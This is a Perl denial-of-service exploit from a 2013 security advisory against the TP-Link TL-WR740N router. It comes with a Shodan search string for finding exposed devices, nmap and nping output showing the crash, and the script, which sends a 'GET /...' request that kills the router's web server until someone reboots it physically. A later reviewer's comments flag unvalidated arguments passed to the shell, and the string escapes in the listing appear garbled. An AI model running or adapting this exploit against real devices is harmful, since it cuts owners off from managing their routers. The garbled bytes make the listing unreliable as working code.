TP-Link TL-WR740N Wireless Router Remote Denial Of Service
#!/usr/local/bin/perl
#
#
# TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
#
#
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.us
#
# Affected version:
#
# - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
# - Hardware version: WR740N v4 00000000 (v4.23)
# - Model No. TL-WR740N / TL-WR740ND
#
# Summary: The TL-WR740N is a combined wired/wireless network connection
# device integrated with internet-sharing router and 4-port switch. The
# wireless N Router is 802.11b&g compatible based on 802.11n technology
# and gives you 802.11n performance up to 150Mbps at an even more affordable
# price. Bordering on 11n and surpassing 11g speed enables high bandwidth
# consuming applications like video streaming to be more fluid.
#
# Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
# remote denial of service vulnerability when processing an HTTP request. This
# issue occurs when the web server (httpd) fails to handle an HTTP GET request
# over a given default TCP port 80. Sending a sequence of three dots (...) to
# the router will crash its httpd service, denying legitimate users access
# to the admin control panel management interface. To bring back the http srv
# and the admin UI, a user must physically reboot the router.
#
#
# ============================== Playground: ==============================
#
# Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
#
#
# nmap -sV 192.168.0.1
#
# Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up (0.00s latency).
# Not shown: 999 closed ports
# PORT STATE SERVICE VERSION
# 80/tcp open http TP-LINK WR740N WAP http config
# MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
# Service Info: Device: WAP
#
# Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
#
# --------------------------------------------------------------------------
# Changed Probe Directive in nmap-service-probes file [4 d range]:
# - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0 |
# + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0 |
# --------------------------------------------------------------------------
#
#
# nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a"
#
# Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time
# SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480
# RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0
#
# Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms
# Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%)
# Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
# Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
# Nping done: 1 IP address pinged in 1.12 seconds
#
# --------------------------------------------------------------------------
#
#
# nmap -Pn 192.168.0.1 -p80
#
# Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up (0.00s latency).
# PORT STATE SERVICE
# 80/tcp closed http
# MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
#
# Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
#
#
# ============================= !Playground ===============================
#
#
# Tested on: Router Webserver
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Copyleft (c) 2013, Zero Science Lab
# Macedonian Information Security Research And Development Laboratory
# http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2013-5135
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
#
#
# 17.03.2013
#

# NOTE(review): this listing is reproduced as found on the page. There is no
# `use strict; use warnings;`, so $ip, $port, $socket and $ta4ke are all
# undeclared package globals. The `x20`/`x1f`/`x47`-style runs inside the
# string literals below look like an extraction artifact; they are kept
# byte-for-byte as found, so the banner and request bytes this copy would
# actually emit may differ from the author's original file - confirm against
# the upstream advisory before drawing conclusions from this listing.
use IO::Socket;

# Target host and port are taken verbatim from the command line. Neither is
# validated (no hostname/IP or numeric-port check) before being used as the
# socket peer and, further down, interpolated into a shell command string.
# With fewer than two arguments both become empty strings here; the usage
# check below only runs after the banner has been printed.
$ip="$ARGV[0]";
$port="$ARGV[1]";

# Banner: a box drawn from repeated literals (repetition operator `x`).
print " x20"."x1f"x42 ." ";
print "x20x1f"."x20"x40 ."x1f ";
print "x20x1f TP-Link TL-WR740N httpd DoS Exploit x1f ";
print "x20x1f"."x20"x40 ."x1f ";
print "x20x1f"."x20"x7 ."x16"x5 ."x20"x15 ."x16"x5 ."x20"x8 ."x1f ";
print "x20x1f"."x20"x9 ."x16"."x20"x19 ."x16"."x20"x10 ."x1f ";
print "x20" ."x1f"x42 ." ";
print "x20x4" ."x20"x40 ."x4 ";
print "x20" ."x1e" x 42 ." ";

# Usage check: only tests that two arguments are present ($#ARGV is the index
# of the last element of @ARGV), not that they are well-formed.
if($#ARGV<1) {
    print " x20x20x1ax20Usage: $0 <ip> <port> ";
    exit();
}

# TCP connect to the target. The return value is never checked (no `or die`),
# so a failed connect is not reported here; $socket would then be unset when
# it is printed to below.
$socket=IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => $ip,
    PeerPort => $port
);

# The request described in the Desc section of the header, assembled from
# concatenated literals (kept exactly as found on the page).
$ta4ke="x47x45x54x20".
       "x2fx2ex2ex2e".
       "x20x48x54x54".
       "x50x2fx31x2e".
       "x31x0dx0ax0d".
       "x0a";

print " x20x1ax20Sending evil payload... ";
sleep 2;
# Writes the request once and never reads a response; the fixed sleeps are the
# only "wait" for an effect, and nothing in the script itself confirms one.
print $socket "$ta4ke";
sleep 5;
# Unchecked close; an error here is silently lost.
close $socket;
print "x20x1ax20HTTPd successfully poked. ";
sleep 2;
print "x20x1ax20Verifying with Nmap... ";
sleep 2;
# Port-state check after the send, run through the shell with the unvalidated
# $ip/$port interpolated. A hostile or mistyped argument is passed straight to
# the shell on the operator's own machine. The list form,
# `system('nmap', '-Pn', $ip, '-p', $port)`, would avoid the shell entirely.
system("nmap -Pn $ip -p $port");
print " x20x1ax20Playing goa-psy... ";
sleep 2;
# Cosmetic side effect unrelated to the test: launches a media player with a
# stream URL via the Windows `start` command, so this step is Windows-only.
# NOTE(review): `\P` and `\W` are not recognised escapes in a double-quoted
# Perl string, so the path likely does not survive interpolation as written.
system("start C:\Progra~1\Winamp\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008");
sleep 1;
print "x20x1ax20All Done! ";
sleep 1;
# Codename: Threetwoees
